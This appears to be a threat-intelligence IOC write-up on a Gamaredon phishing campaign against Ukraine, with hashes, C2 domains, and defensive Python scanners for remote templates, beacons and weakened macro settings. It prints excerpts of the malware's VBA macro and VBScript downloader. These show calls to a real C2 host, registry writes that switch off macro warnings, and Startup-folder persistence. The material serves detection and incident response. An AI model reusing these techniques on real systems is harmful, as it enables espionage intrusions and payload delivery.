- #IOC #OptiData #VR #Gamaredon #xml.rels #macro #WSH
- https://pastebin.com/Vhb4KF5L
- FAQ:
- https://radetskiy.wordpress.com/2019/11/19/ioc_gamaredon_181119/
- https://www.malcrawler.com/russias-gamaredon-group-new-cyber-espionage-campaign-against-ukraine/
- https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html
- https://whotippedmycows.com/gamaredon-targets-ukraine-using-cve-2017-0199/
- https://malpedia.caad.fkie.fraunhofer.de/actor/gamaredon_group
- attack_vector
- --------------
- email attach .zip > .docx > settings.xml.rels (external attachedTemplate) > GET apu.dot > Document_Open macro > DROP templates.vbs into Startup > WSH > 3rd stage ..
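The first two hops of the chain above (a settings.xml.rels entry whose attached-template target is a remote .dot, which Word fetches when the .docx opens) can be triaged without ever opening the file in Word. The following is an added example written for this page, not code from the original paste: it builds a constructed minimal OOXML package carrying an external attachedTemplate relationship that mirrors the win-apu.ddns.net/apu.dot URL, then scans every .rels part for TargetMode="External" relationships and separates the ones Word resolves automatically from click-only hyperlinks. The sample parts, the severity mapping and the AUTO_FETCH_TYPES set are assumptions for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Relationship types Word resolves on open without user interaction (assumed list).
# An External target of one of these means an outbound fetch as soon as the
# document is rendered; hyperlinks are External too but only fire on click.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "frame", "image"}

# Constructed sample parts (not extracted from the real провадження.docx): the
# settings.xml.rels entry reproduces the mechanism described in the paste.
SETTINGS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="http://win-apu.ddns.net/apu.dot" TargetMode="External"/>'
    '</Relationships>'
)
DOCUMENT_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    '<Relationship Id="rId2" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
    'Target="https://example.org/" TargetMode="External"/>'
    '</Relationships>'
)


def build_sample_docx() -> bytes:
    """Minimal OOXML-shaped zip carrying the two constructed .rels parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", "<w:settings/>")
        z.writestr("word/_rels/settings.xml.rels", SETTINGS_RELS)
        z.writestr("word/_rels/document.xml.rels", DOCUMENT_RELS)
    return buf.getvalue()


def scan_external_rels(docx_bytes: bytes) -> list[dict]:
    """Return every TargetMode="External" relationship found in any .rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": name,
                    "type": rel_type,
                    "target": rel.get("Target", ""),
                    "severity": "high" if rel_type in AUTO_FETCH_TYPES else "info",
                })
    return findings


def remote_template_hosts(findings: list[dict]) -> list[str]:
    """Hostnames a remote-template fetch would contact (block / hunt list)."""
    hosts = set()
    for f in findings:
        if f["type"] == "attachedTemplate":
            m = re.match(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", f["target"], re.I)
            if m:
                hosts.add(m.group(1).lower())
    return sorted(hosts)


if __name__ == "__main__":
    results = scan_external_rels(build_sample_docx())
    for r in results:
        print(f"{r['severity']:<4} {r['part']:<32} {r['type']:<16} {r['target']}")
    print("remote template hosts:", remote_template_hosts(results))
```

On a real sample, pass the file's bytes to scan_external_rels(); an external attachedTemplate is the high-severity case in this chain, and the host list drops straight into a proxy block or a DNS hunt.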
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a
- File name провадження.docx (Ukrainian: "proceedings") [Zip archive data, at least v2.0 to extract]
- File size 49.8 kB
- SHA-256 e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8
- File name apu[1].dot [Composite Document File V2 Document, Little Endian, Code page: 1251]
- File size 47.1 kB
- SHA-256 39c6884526e7b7f2ed6e47b630010508bb5957385eccf248c961cbd5bcb802c6
- File name templates.vbs [Little-endian UTF-16 Unicode text, with CRLF, CR line terminators]
- File size 8.9 kB
- activity
- **************
- PL_SCR 141.8.195.60 win-apu.ddns.net [from settings.xml.rels]
- C2 2.59.41.5 get-icons.ddns.net [from templates.vbs]
- netwrk
- --------------
- [http]
- 141.8.195.60 win-apu.ddns.net GET /apu.dot HTTP/1.1 Mozilla/4.0
- 2.59.41.5 get-icons.ddns.net GET /Host_ID//autoindex.php HTTP/1.1 Mozilla/4.0
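The two GETs above give a shape to alert on: the beacon path is built by the macro as ComputerName_Hex(volume serial)//autoindex.php (the Host_ID placeholder in the list), and the template fetch is a bare Mozilla/4.0 request for a .dot on a dynamic-DNS host. Added example, not from the original paste: a Python pass over constructed, tab-separated proxy log lines that flags both events and decodes the Host_ID back into hostname and volume serial, so the victim can be identified from the URL alone. The log format, the client addresses and the OPERATOR-PC_6E7A1B2C host id are made up for the example.

```python
import re
from dataclasses import dataclass

# Constructed proxy log (tab-separated: time, client, method, URL, User-Agent).
# Not a capture from the incident; the two URLs mirror the ones listed above,
# with a made-up Host_ID of the form the macro builds: <ComputerName>_<Hex(serial)>.
SAMPLE_LOG = """\
2019-11-18T16:17:40\t10.0.0.21\tGET\thttp://win-apu.ddns.net/apu.dot\tMozilla/4.0
2019-11-18T16:18:02\t10.0.0.21\tGET\thttp://get-icons.ddns.net/OPERATOR-PC_6E7A1B2C//autoindex.php\tMozilla/4.0
2019-11-18T16:18:05\t10.0.0.22\tGET\thttp://example.org/index.php\tMozilla/5.0 (Windows NT 10.0)
2019-11-18T16:21:07\t10.0.0.21\tGET\thttp://get-icons.ddns.net/OPERATOR-PC_6E7A1B2C//autoindex.php\tMozilla/4.0
"""

# Path layout produced by the macro: "/" & ComputerName & "_" & Hex(SerialNumber) & "//autoindex.php".
# VBA Hex() of a 32-bit Long yields 1..8 upper-case hex digits, so the serial group is bounded.
BEACON_PATH = re.compile(r"^/(?P<host>.+)_(?P<serial>[0-9A-F]{1,8})//autoindex\.php$")
DYNDNS_SUFFIXES = (".ddns.net", ".hopto.org")   # providers seen in this actor's C2 lists


@dataclass
class Hit:
    time: str
    client: str
    kind: str          # "template-fetch" or "beacon"
    domain: str
    victim_host: str = ""
    volume_serial: str = ""


def decode_host_id(path: str):
    """Recover (ComputerName, volume serial as XXXX-XXXX) from a beacon path, or None."""
    m = BEACON_PATH.match(path)
    if not m:
        return None
    serial = m.group("serial").rjust(8, "0")   # Hex() drops leading zeros; `vol` prints 8 digits
    return m.group("host"), f"{serial[:4]}-{serial[4:]}"


def scan_proxy_log(text: str) -> list[Hit]:
    """Flag remote-template fetches and autoindex.php beacons in the log text."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, ua = line.split("\t")
        m = re.match(r"^https?://([^/]+)(/.*)$", url)
        if not m:
            continue
        domain, path = m.group(1).lower(), m.group(2)
        decoded = decode_host_id(path)
        if decoded:
            hits.append(Hit(ts, client, "beacon", domain, *decoded))
        elif (domain.endswith(DYNDNS_SUFFIXES)
              and path.lower().endswith((".dot", ".dotm"))
              and ua.startswith("Mozilla/4.0")):
            hits.append(Hit(ts, client, "template-fetch", domain))
    return hits


if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_LOG):
        print(h)
```

The decoded volume serial is the same value `vol C:` prints on the host, which makes it a quick way to confirm which machine a beacon came from when the computer name is ambiguous or has been reused.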
- comp
- --------------
- wscript.exe 3684 TCP localhost 49419 vds-ce34203.timeweb.ru http
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- [another context]
- C:\Windows\system32\wbem\wmiprvse.exe -Embedding
- [another context]
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs"
- persist
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 18.11.2019 16:17
- templates.vbs
- c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\templates.vbs
- drop
- --------------
- C:\tmp\Temporary Internet Files\Content.IE5\3YAVTBAP\apu[1].dot
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs
- @ @ @
- C2 (other domains, previous): union of the lists published by whotippedmycows.com and malcrawler.com, duplicates removed
- --------------
- unhcr.ddns.net
- rnbo-ua.ddns.net
- network-crash.ddns.net
- checkhurl.site
- get-icons.ddns.net
- bitvers.ddns.net
- shell-sertificates.ddns.net
- bitread.ddns.net
- sv-menedgment.ddns.net
- lookups.ddns.net
- libresoft.ddns.net
- document-write.ddns.net
- suipost.ddns.net
- document-listing.ddns.net
- list-sert.ddns.net
- military-ua.ddns.net
- const-gov.ddns.net
- my-certificates.ddns.net
- checkhurl.fun
- libre-boot.ddns.net
- kristo-ua.ddns.net
- templates.hopto.org
- checkhurl.website
- constructor-word.ddns.net
- creative-office.ddns.net
- kornet-ua.ddns.net
- duktas-dde.ddns.net
- message-office.ddns.net
- micro-office.ddns.net
- checkhurl.space
- checkhurl.info
- underlord.site
- underlord.fun
- underlord.space
- @ @ @
- metadata of 1st stage (провадження.docx)
- --------------
- File Size : 49 kB
- File Modification Date/Time : 2019:11:18 12:19:29+02:00
- File Access Date/Time : 2019:11:19 01:52:13+02:00
- File Inode Change Date/Time : 2019:11:19 01:51:55+02:00
- File Permissions : rw-rw-r--
- File Type : DOCX
- File Type Extension : docx
- MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
- Zip Required Version : 20
- Zip Bit Flag : 0x0006
- Zip Compression : Deflated
- Zip Modify Date : 1980:01:01 00:00:00
- Zip CRC : 0x5d2e7c58
- Zip Compressed Size : 176
- Zip Uncompressed Size : 247
- Zip File Name : customXml/item1.xml
- Template : UrbanResume.Dotx
- Total Edit Time : 2 minutes
- Pages : 1
- Words : 111
- Characters : 635
- Application : Microsoft Office Word
- Doc Security : None
- Lines : 5
- Paragraphs : 1
- Scale Crop : No
- Heading Pairs : Title, 1
- Titles Of Parts :
- Company : Reanimator Extreme Edition
- Links Up To Date : No
- Characters With Spaces : 745
- Shared Doc : No
- Hyperlinks Changed : No
- App Version : 12.0000
- Creator : ШУРИК
- Last Modified By : ШУРИК
- Revision Number : 3
- Create Date : 2019:11:18 07:03:00Z
- Modify Date : 2019:11:18 07:03:00Z
- @ @ @
- metadata of 2nd stage (apu[1].dot)
- --------------
- File Size : 46 kB
- File Modification Date/Time : 2019:11:06 14:39:21+02:00
- File Access Date/Time : 2019:11:19 01:51:58+02:00
- File Inode Change Date/Time : 2019:11:19 01:51:58+02:00
- File Permissions : rw-rw-r--
- File Type : DOT
- File Type Extension : dot
- MIME Type : application/msword
- Title :
- Subject :
- Author : ШУРИК
- Keywords :
- Template : apu.dot
- Last Modified By : ШУРИК
- Revision Number : 17
- Software : Microsoft Office Word
- Total Edit Time : 1.0 minutes
- Create Date : 2019:09:11 04:30:00
- Modify Date : 2019:11:18 12:18:00
- Pages : 1
- Words : 2
- Characters : 16
- Security : None
- Code Page : Windows Cyrillic
- Company : Reanimator Extreme Edition
- Lines : 1
- Paragraphs : 1
- Char Count With Spaces : 17
- App Version : 12.0000
- Scale Crop : No
- Links Up To Date : No
- Shared Doc : No
- Hyperlinks Changed : No
- Title Of Parts :
- Heading Pairs : Название (Russian: "Title"), 1
- Comp Obj User Type Len : 39
- Comp Obj User Type : Документ Microsoft Office Word 97-2003 ("Документ" = "Document")
- @ @ @
- drop-apu[1].dot [macro]
- --------------
- VBA MACRO ThisDocument.cls
- in file: f2.dot - OLE stream: u'Macros/VBA/ThisDocument'
- +----------+--------------------+---------------------------------------------+
- |Type |Keyword |Description |
- +----------+--------------------+---------------------------------------------+
- |AutoExec |Document_Open |Runs when the Word or Publisher document is |
- | | |opened |
- |Suspicious|CreateObject |May create an OLE object |
- |Suspicious|CreateTextFile |May create a text file |
- |Suspicious|ADODB.Stream |May create a text file |
- |Suspicious|SaveToFile |May create a text file |
- |Suspicious|Environ |May read system environment variables |
- |Suspicious|Shell |May run an executable file or a system |
- | | |command |
- |Suspicious|WScript.Shell |May run an executable file or a system |
- | | |command |
- |Suspicious|Write |May write to a file (if combined with Open) |
- |Suspicious|Open |May open a file |
- |Suspicious|Windows |May enumerate application windows (if |
- | | |combined with Shell.Application object) |
- |Suspicious|Chr |May attempt to obfuscate specific strings |
- | | |(use option --deobf to deobfuscate) |
- |Suspicious|Xor |May attempt to obfuscate specific strings |
- | | |(use option --deobf to deobfuscate) |
- |Suspicious|AccessVBOM |May attempt to disable VBA macro security and|
- | | |Protected View |
- |Suspicious|VBAWarnings |May attempt to disable VBA macro security and|
- | | |Protected View |
- |Suspicious|MSXML2.XMLHTTP |May download files from the Internet |
- |Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
- | | |used to obfuscate strings (option --decode to|
- | | |see all) |
- |Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
- | | |used to obfuscate strings (option --decode to|
- | | |see all) |
- |IOC |http://get- |URL |
- | |icons.ddns.net/ | |
- |IOC |templates.vbs |Executable file name |
- +----------+--------------------+---------------------------------------------+
- @ @ @ [f2.dot _ VBA, excerpt: non-contiguous lines selected by the analyst; olevba was run on a copy named f2.dot]
- Private Sub Document_Open()
- Dim GoihGFG
- GoihGFG = "Set WShell=CreateObject(""WScript.Shell"")"
- Set rSwistz = CreateObject("WScript.Network")
- Set MHHEFbR = CreateObject("Scripting.FileSystemObject")
- jSsmRUH = MHHEFbR.Drives(Environ("SystemDrive")).SerialNumber   ' volume serial of the system drive
- NlnQCJG = rSwistz.ComputerName
- dqEBCgG$ = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & _
- "\Word\Security\"
- CreateObject("WScript.Shell").RegWrite dqEBCgG$ & "AccessVBOM", 1, "REG_DWORD"    ' trust access to the VBA project object model
- CreateObject("WScript.Shell").RegWrite dqEBCgG$ & "VBAWarnings", 1, "REG_DWORD"   ' 1 = "Enable all macros": no prompt for later documents
- uRDEJCn = Hex(jSsmRUH)
- ZWyEwtz = "http://get-icons.ddns.net/" & NlnQCJG & "_" & uRDEJCn & "//autoindex.php"   ' victim id = <ComputerName>_<Hex(serial)>
- ' the remaining lines are VBScript source text that the macro writes into templates.vbs
- fQCBSyj = AppPaths + "\Microsoft\Windows\Start Menu\Programs\Startup\""+" + "RandStrinh" + "+"".exe"
- AREdQgT = AppPaths + "\""+ RandStrinh +" + """.txt"
- LaIPBvl.Write "Dim GenRandom" + vbCrLf
- LaIPBvl.Write "Const FoRandString = ""abcdefghijklmnopqrstuvwxyz0123456789""" + vbCrLf
- LaIPBvl.Write "If f.Size < 11485 Then f.Delete" + vbCrLf
- LaIPBvl.Write "Set HCJySbu = GetObject(""WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem"")" + vbCrLf
- LaIPBvl.Close
- End Sub
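The two RegWrite calls in the macro above are what a responder should check on every host that opened the document, because they outlive the document: VBAWarnings=1 under HKCU\Software\Microsoft\Office\<version>\Word\Security is "Enable all macros", so every later macro document runs without a prompt for that user, and AccessVBOM=1 lets any script read and rewrite VBA projects. Added example, not the author's code: a Python parser for the output of `reg query HKCU\Software\Microsoft\Office /s` that flags the two weakened values under any Office application's Security key and emits the reg.exe commands that restore the defaults (2 and 0). The sample output below is constructed, including the 16.0 keys; the VBAWarnings value table is Word's documented meaning of the setting.

```python
import re

# Meaning of HKCU\...\<app>\Security\VBAWarnings (Trust Center macro setting).
VBA_WARNINGS = {
    1: "Enable all macros (macro security disabled)",
    2: "Disable all macros with notification (default)",
    3: "Disable all macros except digitally signed macros",
    4: "Disable all macros without notification",
}

# Constructed output in the shape of `reg query HKCU\Software\Microsoft\Office /s`
# (assumed sample, not captured from the infected host). The 12.0\Word\Security
# key shows the two values the macro writes; the 16.0 keys are clean controls.
SAMPLE_REG_QUERY = """\
HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Security
    AccessVBOM    REG_DWORD    0x1
    VBAWarnings    REG_DWORD    0x1

HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Security
    VBAWarnings    REG_DWORD    0x2
    AccessVBOM    REG_DWORD    0x0

HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Excel\\Security
    VBAWarnings    REG_DWORD    0x3
"""

SECURITY_KEY = re.compile(r"\\Office\\(?P<ver>\d+\.\d+)\\(?P<app>\w+)\\Security$", re.I)
VALUE_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>\S+)\s*$")


def parse_reg_query(text: str):
    """Yield (key, value name, int data) for REG_DWORD values under any Office Security key."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if key and m and m.group("type") == "REG_DWORD" and SECURITY_KEY.search(key):
            yield key, m.group("name"), int(m.group("data"), 16)


def audit_macro_security(text: str) -> list[dict]:
    """Flag Security values that disable the macro prompt or trust VBOM access."""
    findings = []
    for key, name, value in parse_reg_query(text):
        km = SECURITY_KEY.search(key)
        app, ver = km.group("app"), km.group("ver")
        reason = None
        if name.lower() == "vbawarnings" and value == 1:
            reason = VBA_WARNINGS[1]
        elif name.lower() == "accessvbom" and value == 1:
            reason = "Trust access to the VBA project object model is enabled"
        if reason:
            findings.append({"key": key, "app": app, "version": ver,
                             "setting": name, "value": value, "reason": reason})
    return findings


def remediation_commands(findings: list[dict]) -> list[str]:
    """reg.exe commands that restore the defaults (VBAWarnings=2, AccessVBOM=0)."""
    cmds = []
    for f in findings:
        default = 2 if f["setting"].lower() == "vbawarnings" else 0
        key = f["key"].replace("HKEY_CURRENT_USER", "HKCU", 1)
        cmds.append(f'reg add "{key}" /v {f["setting"]} /t REG_DWORD /d {default} /f')
    return cmds


if __name__ == "__main__":
    found = audit_macro_security(SAMPLE_REG_QUERY)
    for f in found:
        print(f"{f['app']} {f['version']}: {f['setting']}={f['value']}  ({f['reason']})")
    for c in remediation_commands(found):
        print(c)
```

Because the macro keys off Application.Version, the weakened key is the one for whichever Office build opened the lure (12.0 here, matching the Office12 WINWORD.EXE in the proc section); scanning every version under the Office key rather than a single hard-coded one is what makes the check reusable across a fleet.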
- @ @ @ [templates.vbs, excerpt: non-contiguous lines selected by the analyst; "C:\Users\name\..." is the path as pasted]
- Function ibiexCm(URLA)
- On Error Resume Next
- Set DfnssAH = CreateObject("MSXML2.XMLHTTP")   ' downloader
- Set PuchGYo = CreateObject( "Scripting.FileSystemObject" )
- Function RandomString(ByVal palvados)
- Dim GenRandom
- Const FoRandString = "abcdefghijklmnopqrstuvwxyz0123456789"
- Randomize
- For i = 1 To palvados
- GenRandom = GenRandom & Mid(FoRandString, Int(36 * Rnd + 1), 1)
- Next
- Set KHQCFif = CreateObject("Scripting.FileSystemObject")
- Set jKFUmKe = CreateObject("ADODB.Stream")
- jKFUmKe.SaveToFile "C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt"   ' downloaded payload stored as a random-name .txt
- Set f = LHswYNG.GetFile("C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt")
- If f.Size < 11485 Then f.Delete   ' downloads smaller than 11485 bytes are discarded
- errResult = Encode( "C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt", "C:\Users\name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+RandStrinh+".exe", arrdqEBCgG )   ' .txt in, random-name .exe out, written into the Startup folder
- WScript.Sleep 6400
- WScript.Sleep 181040
- save ibiexCm("http://get-icons.ddns.net/Host_ID//autoindex.php")   ' Host_ID = <ComputerName>_<Hex(serial)>, built by the macro
- If PuchGYo.Fileexists("C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt") Then PuchGYo.DeleteFile "C:\Users\name\AppData\Roaming\"+ RandStrinh +".txt"
- YDJncEX = 0
- Dim HCJySbu, aCRoeaK, aCRoeaKSheck
- Set HCJySbu = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")   ' WMI handle requested with shutdown privileges
- Next
- End If
- End With
- Loop
- # # #
- https://www.virustotal.com/gui/ip-address/2.59.41.5/relations
- https://www.virustotal.com/gui/ip-address/141.8.195.60/relations
- VR